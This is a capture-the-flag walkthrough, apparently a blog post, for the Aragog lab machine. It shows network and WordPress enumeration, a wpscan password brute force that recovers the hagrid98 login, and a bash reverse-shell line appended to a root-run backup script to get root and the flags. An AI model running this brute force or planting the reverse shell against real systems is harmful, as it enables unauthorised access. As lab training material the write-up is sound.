HarryPotter: Aragog

Description

Enumeration:

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# netdiscover -i vboxnet1
Currently scanning: 192.168.20.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
____________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 08:00:27:f3:04:f7 1 42 PCS Systemtechnik GmbH
192.168.1.101 08:00:27:30:fb:c8 1 60 PCS Systemtechnik GmbH
┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# nmap -v -sT -sC -p- -A 192.168.1.101 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 15:59 IST
..............
Nmap scan report for 192.168.1.101
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:30:FB:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Uptime guess: 41.396 days (since Thu Mar 25 06:29:32 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
http://192.168.1.101/ 
┌──(s4t0sh㉿N4TR0)-[~]
└─$ dirb http://192.168.1.101 130 ⨯

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed May 5 16:16:20 2021
URL_BASE: http://192.168.1.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.101/ ----
==> DIRECTORY: http://192.168.1.101/blog/
+ http://192.168.1.101/index.html (CODE:200|SIZE:97)
==> DIRECTORY: http://192.168.1.101/javascript/
+ http://192.168.1.101/server-status (CODE:403|SIZE:278)

---- Entering directory: http://192.168.1.101/blog/ ----
+ http://192.168.1.101/blog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.101/blog/wp-admin/
==> DIRECTORY: http://192.168.1.101/blog/wp-content/
==> DIRECTORY: http://192.168.1.101/blog/wp-includes/
+ http://192.168.1.101/blog/xmlrpc.php (CODE:405|SIZE:42)
http://192.168.1.101/blog/wp-admin
┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# wpscan --url http://192.168.1.101/blog/ -e ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart


[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.1.101/blog/wp-content/plugins/akismet/
| Latest Version: 4.1.9
| Last Updated: 2021-03-02T18:10:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/akismet/, status: 500
|
| The version could not be determined.

[+] wp-file-manager
| Location: http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/
| Last Updated: 2021-03-30T06:37:00.000Z
| Readme: http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/readme.txt
| [!] The version is out of date, the latest version is 7.1.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/, status: 200
|
| Version: 6.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/readme.txt
http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/files/install.php
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}
┌──(root💀N4TR0)-[/home/s4t0sh/Downloads]
└─# wpscan --url http://192.168.1.101/blog/ -U hagrid98 -P /usr/share/wordlists/rockyou.txt -t 10 _________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________


[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - hagrid98 / password123
Trying hagrid98 / password123 Time: 00:00:17 < > (1390 / 14345782) 0.00% ETA: ??:??:??
./pspy64 -p
hagrid98@Aragog:/opt$  echo "bash -i >& /dev/tcp/192.168.1.1/1212 0>&1 " >> .backup.sh
<i >& /dev/tcp/192.168.1.1/1212 0>&1 " >> .backup.sh
hagrid98@Aragog:/opt$ cat .backup.sh
cat .backup.sh
#!/bin/bash

cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads
bash -i >& /dev/tcp/192.168.1.1/1212 0>&1
root@Aragog:~# cat horcrux2.txt
cat horcrux2.txt
____ _ _ _ _
/ ___|___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
| | / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\____\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/


Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Easy
Machine Name: Aragog
Horcruxes Hidden in this VM: 2 horcruxes

You have successfully pwned Aragog machine.
Here is your second hocrux: horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store